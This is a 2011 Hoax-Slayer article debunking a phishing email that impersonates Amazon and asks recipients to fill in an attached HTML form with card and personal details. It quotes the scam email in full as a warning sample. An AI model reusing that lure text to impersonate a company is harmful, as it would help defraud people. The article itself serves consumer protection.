Debunking email hoaxes and exposing Internet scams since 2003!

Hoax-Slayer Logo Hoax-Slayer Logo

Home    About    New Articles    RSS Feed    Subscriptions    Contact
Bookmark and Share

Issue 118 - September 2011 - Page 2

Amazon Account Review Phishing Scam

Issue 118 Start Menu

Previous Article            Next Article

Email purporting to be from claims that, due to a recent review, access to the recipient's account has been limited until more account information is supplied via an attached form.

Brief Analysis
The email is not from Amazon. Instead, it is a phishing scam designed to steal sensitive personal and financial information from Amazon account holders. Information entered on the bogus form contained in the email's attachment will be sent to cybercriminals.

Bookmark and Share
Detailed analysis and references below example.

Scroll down to submit comments
Last updated: 26th August 2011
First published: 26th August 2011
Article written by Brett M. Christensen
About Brett Christensen and Hoax-Slayer

Subject: [] - You have one new message!

We recently reviewed your account, and we need more information about your business to allow us to provide uninterrupted service. Until we can collect this information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, phone number, IP address, email address.)
2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please verify your information. To do this we have attached a form to this email. Please download the form and follow the instructions on your screen. NOTE: The form needs to be opened in a modern browser which has JavaScript enabled (ie: Internet Explorer 7+, Firefox 3, Safari 3, Opera 9)

We are requesting this information to verify and protect your identity. This is in order to prevent the illegal activity of accounts. We apologize for any inconvenience this may have caused.


Please do not reply to this email.

Sincerely, Security Team

Detailed Analysis
This message, which purports to be from the UK branch of giant online store Amazon, claims that access to the recipient's Amazon account has been limited. According to the message, the user is required to provide more information due to a recent account review. The message claims that the user can restore account access by filling in a verification form contained in an attached file.

However, the email is not from Amazon. In fact, it is a phishing scam designed to trick people into submitting personal and financial information to Internet criminals. Clicking the attachment opens the following bogus form in the user's web browser:

Amazon phishing scam fake form

The bogus form asks for credit card details along with name, address and contact information. The form is designed to resemble a genuine Amazon web page. The scammers include the HTML form as an email attachment rather than a normal webpage in an attempt to avoid the phishing scam detection systems built in to modern web browsers.

If a victim fills in the form and clicks the "Continue" button, all of the requested information can be sent to cybercrimnals. Armed with this stolen information, these criminals can then use the victim's credit card for fraudulent transactions and possibly steal his or her identity. They may also onsell the stolen details to other criminals via online black markets.

Once the bogus form has been submitted, victims are automatically redirected to the genuine Amazon website. Thus, they may remain unaware that they have handed their personal details to criminals until fraudulent transactions and other evidence of identity theft subsequently comes to their attention.

Amazon will never ask customers to provide personal and financial information via an unsolicited email. And the company would certainly never expect customers to provide personal information via an unsecure HTML email attachment.

Any unsolicited email that asks you to provide personal or financial information either by following a link to a website or by opening an email attachment should be treated with due caution. No legitimate company or financial institution is ever likely to request private details from customers using such methods.

Bookmark and Share References
Phishing Scams - Anti-Phishing Information
Identifying Amazon E-mail

comments powered by Disqus

Previous Article            Next Article

Issue 118 Start Menu

Pages in this month's issue:
  1. Protest Message - First Responders Not Invited to 9/11 Tenth Anniversary Ceremony
  2. Amazon Account Review Phishing Scam
  3. 'May God Bless This Kind Person' Spyware Hacker Warning Hoax
  4. Diego Mendez Prayer Request
  5. 'Numerous Spams Activities from a Foreign IP' Webmail Phishing Scam
  6. Hoax - Professional Hacker 'Faceb Hu' Taking Control Of Computers Via Friend Requests
  7. ACH Payment Canceled Malware Email
  8. Fake Child Abduction Alert - Three Year Old Missing from Wollongong
  9. Request to Change Facebook Status to Support Injured Biker George
  10. Bogus Health Warning - Scratch Card 'Silver Nitro Oxide' Coating Causes Skin Cancer
  11. Bogus 'Free Items for Participating' Facebook Events
  12. Overblown and Outdated Warning - Facebook Instant Personalization
  13. Drano Bottle Bomb Warning Message
  14. Hotel "Wrong Transaction" Malware Emails
  15. Invitation FB Olympic Torch Virus Hoax
  16. Warning - ALDI External 4-in-1 Hard Drive Contains Built In Malware
  17. DEW Bottled Water Fatal Poisoning Hoax
  18. Unfounded Rumour - Facebook Friend Request Warning - People Trying to Access Photos of Children
  19. Massive Mound of Writhing Rattle Snakes
  20. eBay 'Trusted Selling with Identity Confirmation' Phishing Scam